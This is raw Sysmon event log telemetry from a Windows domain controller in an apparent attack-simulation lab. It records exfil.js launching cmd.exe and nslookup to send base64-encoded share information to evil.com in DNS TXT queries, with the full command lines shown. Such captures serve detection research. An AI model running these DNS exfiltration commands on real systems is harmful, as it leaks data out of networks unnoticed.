10341000x8000000000000000210000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1344-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.612{2E1864BB-18EE-629A-1144-000000005F02}77967780C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1344-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.618{2E1864BB-18EE-629A-1344-000000005F02}6560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-1144-000000005F02}7796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsvuwqy.tmp 2>&1 10341000x8000000000000000209995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.597{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1244-000000005F02}5556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.581{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1244-000000005F02}5556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.581{2E1864BB-18EE-629A-1244-000000005F02}55561848C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1144-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.406{00000000-0000-0000-0000-000000000000}5196<unknown process>-udptruefalse127.0.0.1-50743-false127.0.0.1-53domain 354300x8000000000000000209991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.312{00000000-0000-0000-0000-000000000000}7964<unknown process>-udpfalsefalse127.0.0.1-50742-false127.0.0.1-53domain 354300x8000000000000000209990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.311{00000000-0000-0000-0000-000000000000}7964<unknown process>-udptruefalse127.0.0.1-50741-false127.0.0.1-53domain 354300x8000000000000000209989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.311{00000000-0000-0000-0000-000000000000}7964<unknown process>-udptruefalse127.0.0.1-50740-false127.0.0.1-53domain 10341000x8000000000000000209988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.579{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1244-000000005F02}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000209987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{00000000-0000-0000-0000-000000000000}2704<unknown process>-udptruefalse127.0.0.1-50739-false127.0.0.1-53domain 354300x8000000000000000209986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{00000000-0000-0000-0000-000000000000}2704<unknown process>-udpfalsefalse127.0.0.1-50738-false127.0.0.1-53domain 354300x8000000000000000209985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.235{00000000-0000-0000-0000-000000000000}2704<unknown process>-udpfalsefalse127.0.0.1-50737-false127.0.0.1-53domain 354300x8000000000000000209984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.159{00000000-0000-0000-0000-000000000000}8112<unknown process>-udpfalsefalse127.0.0.1-50736-false127.0.0.1-53domain 354300x8000000000000000209983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.159{00000000-0000-0000-0000-000000000000}8112<unknown process>-udptruefalse127.0.0.1-50736-false127.0.0.1-53domain 354300x8000000000000000209982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.158{00000000-0000-0000-0000-000000000000}8112<unknown process>-udptruefalse127.0.0.1-50735-false127.0.0.1-53domain 354300x8000000000000000209981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.158{00000000-0000-0000-0000-000000000000}8112<unknown process>-udpfalsefalse127.0.0.1-50734-false127.0.0.1-53domain 354300x8000000000000000209980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.158{00000000-0000-0000-0000-000000000000}8112<unknown process>-udptruefalse127.0.0.1-50734-false127.0.0.1-53domain 10341000x8000000000000000209979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1144-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.559{2E1864BB-18E0-629A-6742-000000005F02}39768096C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-1144-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.565{2E1864BB-18EE-629A-1144-000000005F02}7796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsvuwqy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.544{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsbebz.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.512{2E1864BB-18EE-629A-0F44-000000005F02}79087832C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1044-000000005F02}4780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1044-000000005F02}4780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.497{2E1864BB-18EE-629A-0E44-000000005F02}81087284C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1044-000000005F02}4780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.507{2E1864BB-18EE-629A-1044-000000005F02}4780C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-0E44-000000005F02}8108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsbebz.tmp 2>&1 10341000x8000000000000000209963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.459{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0F44-000000005F02}7908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.459{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0F44-000000005F02}7908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.459{2E1864BB-18EE-629A-0F44-000000005F02}79087832C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0E44-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0F44-000000005F02}7908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000209959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 